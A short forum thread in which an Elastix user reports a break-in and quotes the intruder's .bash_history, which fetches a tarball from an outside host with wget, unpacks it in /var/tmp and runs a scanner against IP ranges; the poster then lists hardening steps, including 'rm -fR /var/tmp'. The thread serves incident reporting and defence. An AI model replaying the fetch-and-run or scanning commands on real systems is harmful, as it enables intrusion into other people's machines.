Elastix Security exploit with /tmp & /var/tmp

Joined
Jun 22, 2007
Messages
13
Points
0
looks like an exploit in Elastix where an unauthorized user is able to create a user
called "test" then from the /home/test directory they are able to download a scan script tar file to the /var/tmp where it is untared and executed..

here is the "/home/test/.bash_history"

w
uname -a
passwd
passwd
cat /proc/cpuinfo
cd /var/tmp
cd scan
./a 216.14
./a 216.17
./a 216.20
./a 216.161
./a 216.162
./a 216.163
w
cd /tmp
ls
cd
ls
cd /var/tmp
ls
wget geocities.com/datacorz/on.tgz
tar xzvf on.tgz
cd scan
./a 200.72
./a 200.71
./a 216.141
./a 216.24
./a 216.151
./a 216.152


I deleted /var/tmp by

rm -fR /var/tmp

then created a sym link to tmp..

ln -s /tmp /var/tmp

I would also recommend mounting /tmp as noexec,nosuid,rw.. as well as running iptables or some firewall.

Any other security recommendations for stock Elastx would be highly appreciated :)
 

lek

Guest
Thanks for the info itakinet,

One question: What contains the file on.tgz?
 

Members online

No members online now.

Latest posts

Forum statistics

Threads
30,987
Messages
131,100
Members
17,716
Latest member
Orbit114
Top